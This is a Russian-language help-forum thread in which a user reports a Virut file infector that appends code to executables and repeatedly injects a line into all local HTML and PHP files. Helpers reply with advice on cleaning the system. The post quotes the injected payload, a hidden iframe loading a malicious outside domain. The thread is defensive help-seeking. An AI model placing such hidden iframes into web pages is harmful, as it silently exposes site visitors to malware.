-
Junior Member
- Вес репутации
- 55
/jL.chura.pl
Вирус заражает находящиеся на диске C: исполняемые файлы (в основном .exe, но возможно не только), не исключино что и на других дисках поскольку после установки винды вирус появился вновь.. дописывая до каждого из них 18944 байта своего кода, особенно усердствуя в папке C:\Windows\system32\. неизвестные процессы не обнаружены
В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:
CODE
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
после удаления через секунду код появляется вновь
после повторной периустановки голой винды в хтмл файлы ничего не дописывается, поетапно будем подключать винду к нету, ставить софт, посмотрим когда активизируется вирус, хочу сравнить исходники инсталях на других дисках, почему то кажется что ехе шники по всех разделах побиты
доктор веб (CureIt) идинтифицирует его как Virus.Win32.Virut.56
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Куреитом до полного излечения лечились?
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Junior Member
- Вес репутации
- 55
до конца не лечился, влом 10 часов ждать, поставил винду как ни странно со всех php файлов на всех дисках удалилились вирусные строки перед боди, подключился в инет все тихо, запустил любой екзешник с любого диска не С, винт сново всбесился во всех 20000 веб файлах опять таже строка
способ ли чения, удалить все ехе файлы со всех дисков, форматить диск С, чем щас и займусь, вирус неплохой новый, пока в СНГ не много его схватили антивирусы на него не реагируют...
-
То, что запускали (любой екзешник с любого диска не С), - пришлите по правилам.
-